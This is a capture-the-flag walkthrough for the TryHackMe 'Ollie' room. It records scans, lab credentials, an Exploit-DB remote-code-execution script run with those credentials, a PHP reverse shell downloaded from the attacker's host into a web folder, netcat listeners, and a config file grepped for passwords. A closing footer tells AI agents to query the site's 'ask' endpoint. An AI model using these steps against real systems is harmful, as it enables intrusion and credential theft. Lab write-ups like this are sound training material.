# Ollie

**Room Link:** <https://tryhackme.com/room/ollie>

## Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXDcdSKlU8rY9ZaQkXW6t%2Fimage.png?alt=media&#x26;token=31def6fe-0d56-49da-9792-bb11075c49cd" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FcyCEUJA6TRk57TRG0MfT%2Fimage.png?alt=media&#x26;token=2caef09d-d51d-4f64-8d04-4558e5542880" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FmcECojwt5OL1B3VBOBfX%2Fimage.png?alt=media&#x26;token=039ca9c9-25d6-41ab-b0c8-c3c233c6c728" alt=""><figcaption></figcaption></figure>

## TCP/1337 - waste

**Kali**

```
nc -v $VICTIM 1337
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FqkRWiIr40tKN90lASyIo%2Fimage.png?alt=media&#x26;token=ae857469-50d6-4eb2-9a36-513127d28054" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Browser**

```
Username: admin
Password: OllieUnixMontgomery!
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FSIsy45vx7JA78fkj0MnK%2Fimage.png?alt=media&#x26;token=d9a8d099-1229-4d24-84b1-cfaf37555da1" alt=""><figcaption></figcaption></figure>

## Initial Shell

**Exploit:** <https://www.exploit-db.com/raw/50963>

**Kali**

```
python3 exploit.py  -usr admin -pwd OllieUnixMontgomery! -cmd 'whoami' -url http://$VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FFjWRmZ5YLBrnaA0lUfB1%2Fimage.png?alt=media&#x26;token=2de0e84d-bcce-452c-aab4-23d3a88d4374" alt=""><figcaption></figcaption></figure>

We can run commands from the browser as well.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FUYBcxKTcvI0kTQKTH4nt%2Fimage.png?alt=media&#x26;token=ce8f7dd3-32c3-44a5-9099-48e1c2c3f9b2" alt=""><figcaption></figcaption></figure>

Got this php reverse shell, just changed the IP

**Kali**

```
git clone https://github.com/pentestmonkey/php-reverse-shell
cd php-reverse-shell
subl php-reverse-shell.php 
python2 -m SimpleHTTPServer 81
```

**Kali**

```
nc -lvnp 1234
```

We have access to write to the immaolllieeboyyy directory so we put our shell there.

**Browser**

```
wget http://$KALI:81/php-reverse-shell.php -O immaolllieeboyyy/test.php
```

**Browser**

<pre><code><strong>http://VICTIM:/immaolllieeboyyy/test.php
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FVZpjErWqlyRznl0HFUDl%2Fimage.png?alt=media&#x26;token=4f7adf9d-2777-46d1-965d-6e4bebe07ff4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FHl8Y1jaovBPvulWxYC7R%2Fimage.png?alt=media&#x26;token=a6f4f232-fb9a-477a-8f7d-5d3150f3d545" alt=""><figcaption></figcaption></figure>

Get autocomplete

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
```

**Victim**

```
cd /var/www/html
grep -ir "pass" config.php -A4 -B4
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXhuDYcJGkRLCuWo7SNpn%2Fimage.png?alt=media&#x26;token=dfb822bb-d46e-4e6b-883e-8f60f42d26ae" alt=""><figcaption></figcaption></figure>

We can login to mysql but didn't find anything

**Victim**

```
mysql -uphpipam_ollie -pIamDah1337estHackerDog!
```

**Victim**

```
su ollie
Password: OllieUnixMontgomery!
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FDbPYp1nh2QuiXeRC1sWZ%2Fimage.png?alt=media&#x26;token=91d3743a-c9e7-4f67-8c6a-42a75fe07372" alt=""><figcaption></figcaption></figure>

## PSPY

**Kali**

```
wget http://$KALI:81/pspy32 
chmod +x pspy32 
./pspy32 
```

**Victim**

```
cd /tmp/
wget http://10.10.231.159:81/pspy32 
chmod +x pspy32 
./pspy32
find / -name "feedme" 2>/dev/null 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FaqqqURZ6vz9rZ9aWyPHA%2Fimage.png?alt=media&#x26;token=92520c9d-f6e0-4da0-ba3c-1e4928125915" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FEA4k1j6sJlTHv5N2Zseg%2Fimage.png?alt=media&#x26;token=5cd77d52-b285-4211-b218-d4703e21f670" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FDKjVoVjXJkdqDYVlHaku%2Fimage.png?alt=media&#x26;token=c6aacc6a-bc71-476d-9e16-501da202d9a5" alt=""><figcaption></figcaption></figure>

**Kali**

```
nc -lvnp 1338
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FOPr4PGfnFLpyxr19QQFU%2Fimage.png?alt=media&#x26;token=3c95a2b2-4e37-49c7-bf10-73bb3512b9dd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FlubMgxSTH7ihF0921Ffj%2Fimage.png?alt=media&#x26;token=04cf7f47-9fc5-41bd-b2d1-981cb87c800f" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/ollie.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
